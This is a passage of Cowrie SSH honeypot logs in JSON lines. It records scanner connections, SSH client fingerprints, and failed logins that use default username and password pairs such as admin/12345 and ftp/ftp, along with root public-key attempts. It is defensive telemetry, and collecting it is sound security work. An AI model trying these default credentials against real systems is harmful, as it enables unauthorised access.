{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:53:35.367635Z","src_ip":"40.76.124.118","session":"8000c18dc4a3"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":38922,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fc765ccbc0c","protocol":"ssh","message":"New connection: 171.243.151.203:38922 (1.2.3.4:22) [session: 8fc765ccbc0c]","sensor":"my-vps","timestamp":"2025-08-28T00:53:41.478830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:53:41.502675Z","src_ip":"171.243.151.203","session":"8fc765ccbc0c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:53:41.709907Z","src_ip":"171.243.151.203","session":"8fc765ccbc0c"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234","message":"login attempt [user/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:53:48.058447Z","src_ip":"171.243.151.203","session":"8fc765ccbc0c"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:53:49.278485Z","src_ip":"171.243.151.203","session":"8fc765ccbc0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54442,"dst_ip":"1.2.3.4","dst_port":22,"session":"c10b7851302c","protocol":"ssh","message":"New connection: 212.227.125.160:54442 (1.2.3.4:22) [session: c10b7851302c]","sensor":"my-vps","timestamp":"2025-08-28T00:53:52.436342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:53:52.437032Z","src_ip":"212.227.125.160","session":"c10b7851302c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:53:52.683300Z","src_ip":"212.227.125.160","session":"c10b7851302c"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T00:53:55.535910Z","src_ip":"212.227.125.160","session":"c10b7851302c"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:53:56.796942Z","src_ip":"212.227.125.160","session":"c10b7851302c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-28T00:53:59.321070Z","src_ip":"212.227.125.160","session":"a1e4429dedd3"}
{"eventid":"cowrie.session.closed","duration":"26.0","message":"Connection lost after 26.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:54:00.631219Z","src_ip":"212.227.125.160","session":"a1e4429dedd3"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":49798,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e8121c92d79","protocol":"ssh","message":"New connection: 171.243.151.203:49798 (1.2.3.4:22) [session: 0e8121c92d79]","sensor":"my-vps","timestamp":"2025-08-28T00:54:20.006420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:54:20.008672Z","src_ip":"171.243.151.203","session":"0e8121c92d79"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:54:20.223285Z","src_ip":"171.243.151.203","session":"0e8121c92d79"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37644,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb5d86137716","protocol":"ssh","message":"New connection: 194.233.79.134:37644 (1.2.3.4:22) [session: fb5d86137716]","sensor":"my-vps","timestamp":"2025-08-28T00:54:20.878042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:54:21.008604Z","src_ip":"194.233.79.134","session":"fb5d86137716"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:54:21.069573Z","src_ip":"194.233.79.134","session":"fb5d86137716"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:22.264468Z","src_ip":"194.233.79.134","session":"fb5d86137716"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:54:23.648579Z","src_ip":"194.233.79.134","session":"fb5d86137716"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:23.689216Z","src_ip":"171.243.151.203","session":"0e8121c92d79"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:54:24.967141Z","src_ip":"171.243.151.203","session":"0e8121c92d79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38038,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e02b671bcee","protocol":"ssh","message":"New connection: 212.227.235.229:38038 (1.2.3.4:22) [session: 6e02b671bcee]","sensor":"my-vps","timestamp":"2025-08-28T00:54:27.583023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:54:27.583757Z","src_ip":"212.227.235.229","session":"6e02b671bcee"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:54:27.689200Z","src_ip":"212.227.235.229","session":"6e02b671bcee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:28.006840Z","src_ip":"212.227.235.229","session":"6e02b671bcee"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:54:29.114326Z","src_ip":"212.227.235.229","session":"6e02b671bcee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39296,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b11590c7763","protocol":"ssh","message":"New connection: 212.227.235.229:39296 (1.2.3.4:22) [session: 0b11590c7763]","sensor":"my-vps","timestamp":"2025-08-28T00:54:31.566288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:54:31.566917Z","src_ip":"212.227.235.229","session":"0b11590c7763"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T00:54:31.670269Z","src_ip":"212.227.235.229","session":"0b11590c7763"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","sensor":"my-vps","timestamp":"2025-08-28T00:54:31.879834Z","src_ip":"212.227.235.229","session":"0b11590c7763"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:31.880453Z","src_ip":"212.227.235.229","session":"0b11590c7763"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","sensor":"my-vps","timestamp":"2025-08-28T00:54:31.984977Z","src_ip":"212.227.235.229","session":"0b11590c7763"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ad:f6:e2:86:a7:a0:7c:78:07:8d:ea:eb:c0:ee:b1:53","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T00:54:31.985656Z","src_ip":"212.227.235.229","session":"0b11590c7763"}
